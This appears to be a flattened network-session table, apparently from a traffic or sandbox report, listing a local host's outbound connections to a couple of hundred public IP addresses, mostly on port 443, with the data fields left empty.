                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17003192.168.2.134973853.52.116.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17004192.168.2.134061082.23.127.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17005192.168.2.13473442.36.115.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17006192.168.2.133738236.218.143.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17007192.168.2.1344922185.43.75.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17008192.168.2.134162295.64.234.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17009192.168.2.134654272.56.78.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17010192.168.2.134837635.106.240.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17011192.168.2.1338810104.107.242.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17012192.168.2.1344372113.102.229.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17013192.168.2.135921461.57.119.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17014192.168.2.134284027.155.114.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17015192.168.2.135005852.105.164.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17016192.168.2.134136495.226.113.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17017192.168.2.1341080151.38.67.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17018192.168.2.1345902180.142.131.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17019192.168.2.13418861.143.128.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17020192.168.2.1343764156.203.171.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17021192.168.2.1357728169.112.201.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17022192.168.2.1339848146.48.71.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17023192.168.2.134606619.90.119.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17024192.168.2.1352910174.128.23.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17025192.168.2.1359736150.233.76.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17026192.168.2.1337532168.213.204.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17027192.168.2.1338664123.97.4.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17028192.168.2.1357508119.171.184.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17029192.168.2.1355228171.91.122.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17030192.168.2.135779071.223.176.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17031192.168.2.135108894.7.222.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17032192.168.2.134744039.254.43.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17033192.168.2.135094261.68.177.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17034192.168.2.135681439.51.115.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17035192.168.2.1346684119.9.33.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17036192.168.2.13384742.8.161.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17037192.168.2.1337602134.151.61.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17038192.168.2.1335300166.178.40.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17039192.168.2.135169465.148.68.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17040192.168.2.1351526115.24.63.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17041192.168.2.133799418.168.205.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17042192.168.2.133477646.169.75.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17043192.168.2.1351196195.21.213.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17044192.168.2.1333788108.28.151.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17045192.168.2.134043817.131.202.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17046192.168.2.133296812.73.128.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17047192.168.2.1343504201.209.168.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17048192.168.2.1355292168.230.86.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17049192.168.2.134152484.92.66.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17050192.168.2.13427529.188.44.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17051192.168.2.134527268.6.104.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17052192.168.2.1333800111.128.144.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17053192.168.2.135462849.27.225.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17054192.168.2.1357192139.122.221.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17055192.168.2.1356610164.74.68.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17056192.168.2.1356178130.129.172.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17057192.168.2.1342370124.87.244.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17058192.168.2.1352788206.146.153.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17059192.168.2.1341738165.4.216.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17060192.168.2.1357960154.238.139.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17061192.168.2.134229887.0.135.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17062192.168.2.134335443.62.223.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17063192.168.2.1339354199.121.50.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17064192.168.2.133739685.221.67.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17065192.168.2.1336090110.101.67.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17066192.168.2.135445639.240.232.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17067192.168.2.1339944136.28.3.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17068192.168.2.136026427.16.65.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17069192.168.2.1342368205.184.9.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17070192.168.2.134215496.239.200.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17071192.168.2.134541262.120.17.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17072192.168.2.134099458.209.78.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17073192.168.2.1354190171.157.183.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17074192.168.2.1338564144.186.139.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17075192.168.2.1332808138.117.154.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17076192.168.2.135938013.137.89.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17077192.168.2.1360202182.157.2.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17078192.168.2.1340862181.132.136.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17079192.168.2.1346006217.181.208.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17080192.168.2.1355302144.114.247.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17081192.168.2.136092490.216.45.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17082192.168.2.134067625.130.135.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17083192.168.2.134238819.35.159.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17084192.168.2.134357276.163.141.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17085192.168.2.135681099.9.23.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17086192.168.2.1346424185.181.146.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17087192.168.2.1339214145.219.233.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17088192.168.2.1343084135.122.163.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17089192.168.2.134822225.175.144.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17090192.168.2.135212638.207.235.888080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17091192.168.2.1336942194.144.67.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17092192.168.2.1339764133.161.3.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17093192.168.2.135764873.156.35.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17094192.168.2.134959492.28.84.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17095192.168.2.1351612161.82.45.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17096192.168.2.135368484.204.44.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17097192.168.2.133462462.33.114.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17098192.168.2.133392467.105.97.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17099192.168.2.1347226196.175.2.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17100192.168.2.135388685.167.99.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17101192.168.2.1350284162.39.209.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17102192.168.2.135259020.251.242.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17103192.168.2.1332840178.240.37.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17104192.168.2.1348130204.111.86.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17105192.168.2.135610677.236.231.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17106192.168.2.135576013.2.164.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17107192.168.2.133458827.123.25.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17108192.168.2.134006085.138.207.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17109192.168.2.135580080.219.154.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17110192.168.2.1349196179.160.67.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17111192.168.2.134568431.235.150.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17112192.168.2.1357600191.217.89.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17113192.168.2.1353664204.12.209.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17114192.168.2.135791650.105.154.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17115192.168.2.1350016181.186.243.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17116192.168.2.1354542221.174.106.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17117192.168.2.134507832.116.24.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17118192.168.2.1334892153.192.81.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17119192.168.2.1360164137.213.151.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17120192.168.2.13402045.95.68.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17121192.168.2.1339958205.188.229.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17122192.168.2.134568274.140.52.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17123192.168.2.1359774114.48.1.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17124192.168.2.135610249.222.14.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17125192.168.2.135703870.22.119.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17126192.168.2.1342460188.145.57.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17127192.168.2.1349418105.0.207.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17128192.168.2.1352912166.170.110.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17129192.168.2.135585681.233.157.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17130192.168.2.1347210118.199.58.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17131192.168.2.13333021.29.94.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17132192.168.2.1359108118.146.48.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17133192.168.2.1346048136.222.190.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17134192.168.2.1359634106.217.5.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17135192.168.2.1350172177.203.209.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17136192.168.2.1351300198.133.138.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17137192.168.2.133586417.251.254.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17138192.168.2.1349936204.224.91.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17139192.168.2.135318078.31.142.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17140192.168.2.1349332202.63.39.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17141192.168.2.1348638168.60.10.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17142192.168.2.1336804173.114.46.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17143192.168.2.1349050184.163.82.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17144192.168.2.1344736207.69.44.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17145192.168.2.1355796108.243.228.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17146192.168.2.1345374171.130.111.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17147192.168.2.1359496143.253.223.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17148192.168.2.1348532103.165.92.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17149192.168.2.134289477.249.163.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17150192.168.2.1336760130.112.250.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17151192.168.2.1338430219.111.130.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17152192.168.2.1341708134.50.249.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17153192.168.2.13586004.57.170.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17154192.168.2.134549423.87.118.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17155192.168.2.134914481.204.68.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17156192.168.2.134528842.88.95.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17157192.168.2.134050067.28.9.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17158192.168.2.1339270134.94.38.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17159192.168.2.1358794176.17.167.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17160192.168.2.1349254155.94.222.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17161192.168.2.1346666203.161.5.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17162192.168.2.1334378113.124.26.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17163192.168.2.133867078.166.218.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17164192.168.2.1345052176.94.22.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17165192.168.2.1349098142.153.153.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17166192.168.2.1337598198.85.30.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17167192.168.2.1353418176.110.58.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17168192.168.2.1344992197.178.105.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17169192.168.2.135500696.206.183.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17170192.168.2.135947694.186.107.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17171192.168.2.1357786144.176.164.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17172192.168.2.1348618102.231.146.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17173192.168.2.135913817.193.100.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17174192.168.2.134888678.5.18.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17175192.168.2.1355376155.138.193.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17176192.168.2.1337062157.248.146.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17177192.168.2.1349812148.83.146.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17178192.168.2.135179873.118.192.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17179192.168.2.135344682.185.159.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17180192.168.2.1347214118.19.173.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17181192.168.2.1333430182.162.135.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17182192.168.2.1358126114.84.111.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17183192.168.2.134023066.196.237.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17184192.168.2.1337302117.12.108.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17185192.168.2.134338619.205.4.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17186192.168.2.1348730110.152.37.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17187192.168.2.1337668174.180.215.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17188192.168.2.135010677.107.112.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17189192.168.2.1342888149.77.69.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17190192.168.2.1359058185.190.114.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17191192.168.2.135571832.200.199.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17192192.168.2.1347216222.234.220.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17193192.168.2.135915849.26.34.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17194192.168.2.135909012.108.200.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17195192.168.2.13488368.26.37.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17196192.168.2.1345746141.44.74.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17197192.168.2.1356192197.18.190.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17198192.168.2.1335534173.80.94.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17199192.168.2.1338644216.142.33.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17200192.168.2.134524062.85.217.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17201192.168.2.133589240.252.83.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17202192.168.2.1354934187.183.198.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17203192.168.2.13504384.141.105.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17204192.168.2.1336172175.4.189.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17205192.168.2.134615034.13.209.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17206192.168.2.1353282191.212.202.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17207192.168.2.1345942130.40.111.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17208192.168.2.134319613.92.254.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17209192.168.2.1342706181.107.164.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17210192.168.2.135429480.72.141.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17211192.168.2.1347960156.113.41.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17212192.168.2.135789265.112.36.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17213192.168.2.135994247.53.181.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17214192.168.2.1349996210.77.137.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17215192.168.2.135125650.37.111.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17216192.168.2.1347760189.56.117.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17217192.168.2.1354248199.73.145.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17218192.168.2.133400674.151.188.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17219192.168.2.135239091.75.83.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17220192.168.2.1358912109.205.162.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17221192.168.2.13444121.223.223.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17222192.168.2.133813262.195.149.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17223192.168.2.1351224186.53.236.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17224192.168.2.135730090.208.255.58443
                                    TimestampBytes transferredDirectionData


